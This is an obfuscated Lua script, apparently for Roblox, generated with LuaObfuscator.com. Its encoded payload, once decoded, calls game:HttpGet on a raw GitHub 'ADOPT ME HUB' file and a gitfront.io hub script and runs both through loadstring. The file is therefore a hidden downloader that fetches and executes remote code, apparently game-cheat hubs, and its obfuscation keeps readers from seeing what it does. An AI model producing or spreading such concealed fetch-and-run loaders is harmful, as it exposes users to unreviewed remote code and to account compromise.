--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v106=v5(v83,v19);v19=nil;return v106;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -(1637 -(1523 + 114)) ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-1)) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;end end else local v86=568 -(367 + 201) ;local v87;while true do if (v86==((834 + 93) -(214 + 713))) then v87=(1 + 1)^(v32-(1 + (0 -0))) ;return (((v31%(v87 + v87))>=v87) and (878 -(282 + 595))) or 0 ;end end end end local function v21() local v34=1065 -((185 -(32 + 85)) + 978 + 19) ;local v35;while true do if ((1270 -(226 + 1044))==v34) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1;end if (v34==(4 -3)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + 2 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + (443 -(67 + 113))))) + (v39 * 256) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(4 -2)) then v47=v20(v44,16 + 5 ,123 -92 );v48=((v20(v44,984 -((2206 -1404) + 150) )==(2 -1)) and  -((3031 -2258) -(201 + 571))) or (1 -0) ;v42=12 -9 ;end if ((3 + 0)==v42) then if (v47==(997 -(915 + (848 -(745 + 21))))) then if (v46==0) then return v48 * (0 -0) ;else local v107=0 + 0 ;while true do if (v107==(0 -0)) then v47=1188 -(1069 + 118) ;v45=0 -(0 + 0) ;break;end end end elseif (v47==(724 + 456 + 867)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -(0 + 0))))) or (v48 * NaN) ;end return v8(v48,v47-((2070 -(87 + 968)) + 8) ) * (v45 + (v46/((793 -(368 + 423))^(163 -111)))) ;end if (v42==(3 -2)) then v45=19 -(10 + 8) ;v46=(v20(v44,1,8 + 12 ) * ((6 -4)^(122 -90))) + v43 ;v42=444 -(416 + 26) ;end if (v42==((0 -0) -0)) then v43=v23();v44=v23();v42=1 + 0 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=2 -1 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1943 -(1008 + 935) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52~=1) then else local v91=(function() return 0;end)();while true do if (v91==1) then v59=(function() return {};end)();for v108= #"~",v58 do local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v109==0) then local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120==0) then v121=(function() return 156 -(142 + 14) ;end)();while true do if (0==v121) then local v171=(function() return 0;end)();while true do if (v171==1) then v121=(function() return 1794 -(1563 + 230) ;end)();break;end if ((285 -(134 + 151))~=v171) then else v110=(function() return v21();end)();v111=(function() return nil;end)();v171=(function() return 1666 -(970 + 695) ;end)();end end end if (v121~=(1 -0)) then else v109=(function() return 1;end)();break;end end break;end end end if (v109~=1) then else if (v110== #"~") then v111=(function() return v21()~=0 ;end)();elseif (v110==2) then v111=(function() return v24();end)();elseif (v110== #"19(") then v111=(function() return v25();end)();end v59[v108]=(function() return v111;end)();break;end end end v91=(function() return 1992 -(582 + 1408) ;end)();end if (v91==0) then local v101=(function() return 0;end)();while true do if (v101==(3 -2)) then v91=(function() return 1;end)();break;end if (v101==0) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v101=(function() return 1 -0 ;end)();end end end if (v91==2) then v52=(function() return 2;end)();break;end end end if (v52~=(0 -0)) then else local v92=(function() return 0;end)();while true do if (v92==1) then v55=(function() return {};end)();v56=(function() return {};end)();v92=(function() return 2;end)();end if (v92==(1824 -(1195 + 629))) then v53=(function() return function(v112,v113,v114) local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (v115~=0) then else v116=(function() return 0;end)();while true do if (v116==(241 -(187 + 54))) then local v163=(function() return 780 -(162 + 618) ;end)();while true do if (v163~=(0 + 0)) then else local v172=(function() return 0;end)();while true do if (v172~=(0 + 0)) then else v112[v113-#":" ]=(function() return v114();end)();return v112,v113,v114;end end end end end end break;end end end;end)();v54=(function() return {};end)();v92=(function() return 1 -0 ;end)();end if (v92~=(2 -0)) then else v52=(function() return 1;end)();break;end end end if (v52==2) then v57[ #"nil"]=(function() return v21();end)();for v94= #"}",v23() do local v95=(function() return v21();end)();if (v20(v95, #"|", #":")~=(0 + 0)) then else local v102=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if ((1637 -(1373 + 263))~=v102) then else local v117=(function() return 1000 -(451 + 549) ;end)();local v118=(function() return;end)();while true do if (v117~=(0 + 0)) then else v118=(function() return 0 -0 ;end)();while true do if (v118==(0 -0)) then local v170=(function() return 0;end)();while true do if (v170~=(1384 -(746 + 638))) then else v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==(0 + 0)) then local v174=(function() return 0;end)();local v175=(function() return;end)();while true do if (v174~=0) then else v175=(function() return 0;end)();while true do if (v175==0) then v105[ #"nil"]=(function() return v22();end)();v105[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v103== #">") then v105[ #"91("]=(function() return v23();end)();elseif (v103==2) then v105[ #"91("]=(function() return v23() -(2^(23 -7)) ;end)();elseif (v103== #"asd") then local v180=(function() return 341 -(218 + 123) ;end)();local v181=(function() return;end)();while true do if (v180~=(1581 -(1535 + 46))) then else v181=(function() return 0;end)();while true do if (v181~=0) then else v105[ #"91("]=(function() return v23() -((2 + 0)^(3 + 13)) ;end)();v105[ #"0313"]=(function() return v22();end)();break;end end break;end end end v170=(function() return 561 -(306 + 254) ;end)();end if ((1 + 0)==v170) then v118=(function() return 1;end)();break;end end end if (v118==1) then v102=(function() return 3 -1 ;end)();break;end end break;end end end if (3==v102) then if (v20(v104, #"nil", #"gha")~= #"!") then else v105[ #"http"]=(function() return v59[v105[ #"asd1"]];end)();end v54[v94]=(function() return v105;end)();break;end if (0~=v102) then else v103=(function() return v20(v95,2, #"asd");end)();v104=(function() return v20(v95, #"xnxx",1473 -(899 + 568) );end)();v102=(function() return 1;end)();end if (v102==(2 + 0)) then if (v20(v104, #".", #",")~= #"<") then else v105[4 -2 ]=(function() return v59[v105[605 -(268 + 335) ]];end)();end if (v20(v104,292 -(60 + 230) ,2)== #".") then v105[ #"nil"]=(function() return v59[v105[ #"xnx"]];end)();end v102=(function() return 575 -(426 + 146) ;end)();end end end end for v96= #".",v23() do v55,v96,v28=(function() return v53(v55,v96,v28);end)();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[1 + 1 + 1 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1457 -(282 + 1174) ;local v73= -(812 -(569 + 242));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v88=1024 -((1444 -(542 + 196)) + 318) ,v76 do if ((1812<=3249) and (v88>=v70)) then v74[v88-v70 ]=v75[v88 + (1252 -(721 + (1136 -606))) ];else v78[v88]=v75[v88 + (1272 -(945 + 96 + 230)) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if ((v81<=(19 -(4 + 7))) or (2082==4773)) then if (v81<=(3 + 0)) then if (v81<=(701 -(271 + 429))) then if (v81==(0 + (0 -0))) then v78[v80[1502 -(1408 + 92) ]]=v62[v80[7 -4 ]];elseif (v78[v80[1088 -(461 + 625) ]]==v80[1292 -(993 + 295) ]) then v72=v72 + 1 + (1551 -(1126 + 425)) ;else v72=v80[1174 -(418 + 753) ];end elseif (v81==(1 + 1)) then v78[v80[(406 -(118 + 287)) + 1 ]]=v80[3];else do return;end end elseif ((1623<=1957) and (v81<=(2 + 3))) then if (v81>(2 + 2)) then local v127=v80[531 -(406 + 123) ];local v128,v129=v71(v78[v127](v13(v78,v127 + (1770 -((6854 -5105) + 20)) ,v80[1 + 2 ])));v73=(v129 + v127) -(1323 -(1249 + 73)) ;local v130=0 + 0 ;for v156=v127,v73 do local v157=1145 -(466 + 679) ;while true do if ((4412==4412) and ((0 -0)==v157)) then v130=v130 + (2 -1) ;v78[v156]=v128[v130];break;end end end else do return;end end elseif (v81<=(1906 -((1227 -(118 + 1003)) + 1794))) then v78[v80[2]]();elseif ((3244>1055) and (v81>(3 + (11 -7)))) then v78[v80[1 + 1 ]]();else local v159=v80[5 -3 ];v78[v159]=v78[v159](v13(v78,v159 + (2 -1) ,v73));end elseif ((1750>=842) and (v81<=((503 -(142 + 235)) -(4 + 110)))) then if (v81<=(594 -(57 + 527))) then if (v81>(1436 -(41 + 1386))) then v72=v80[13 -10 ];else local v132=v80[105 -(17 + 19 + 67) ];local v133=v78[v80[(980 -(553 + 424)) + 0 ]];v78[v132 + (1 -0) ]=v133;v78[v132]=v133[v80[(20 -9) -7 ]];end elseif ((4372>1850) and (v81>11)) then local v137=v80[168 -(122 + 44) ];v78[v137]=v78[v137](v13(v78,v137 + 1 ,v73));else local v139=0 -0 ;local v140;local v141;local v142;local v143;while true do if (v139==(3 -2)) then v73=(v142 + v140) -(1 + 0) ;v143=0 + 0 ;v139=1 + 1 ;end if ((232<821) and ((3 -1)==v139)) then for v166=v140,v73 do v143=v143 + ((66 + 0) -(30 + 35)) ;v78[v166]=v141[v143];end break;end if ((518<902) and (v139==0)) then v140=v80[2 + 0 ];v141,v142=v71(v78[v140](v13(v78,v140 + (1258 -(1043 + 214)) ,v80[3])));v139=3 -2 ;end end end elseif (v81<=(1226 -(323 + 889))) then if ((v81==(34 -(13 + 8))) or (3313<=1778)) then v78[v80[582 -(154 + 207 + 219) ]]=v62[v80[323 -(53 + 267) ]];else v78[v80[1 + 1 ]]=v80[3];end elseif (v81<=(428 -(15 + 398))) then local v148=v80[984 -(18 + 964) ];local v149=v78[v80[3]];v78[v148 + (3 -(2 + 0)) ]=v149;v78[v148]=v149[v80[3 + (2 -1) ]];elseif ((2994>858) and ((v81>(11 + 5)) or (1421>=2104))) then v72=v80[3];elseif (v78[v80[2]]==v80[(2379 -1525) -(20 + 830) ]) then v72=v72 + 1 ;else v72=v80[3 + 0 ];end v72=v72 + (127 -((259 -143) + 3 + 7)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F44482D536372697074732F41444F50542D4D452D474F442F6D61696E2F41444F50542532304D4525323048554203453O00682O7470733A2O2F67697466726F6E742E696F2F722F52655169755954504C2F7746557964614B37347547782F6875622F7261772F52655169755954504C4875622E6C756100143O00120E3O00013O0026013O00010001000100040A3O0001000100120D000100023O00120D000200033O00200F00020002000400120E000400054O000B000200044O000700013O00022O000600010001000100120D000100023O00120D000200033O00200F00020002000400120E000400064O000B000200044O000700013O00022O000600010001000100040A3O0013000100040A3O000100012O00033O00017O00",v9(),...);
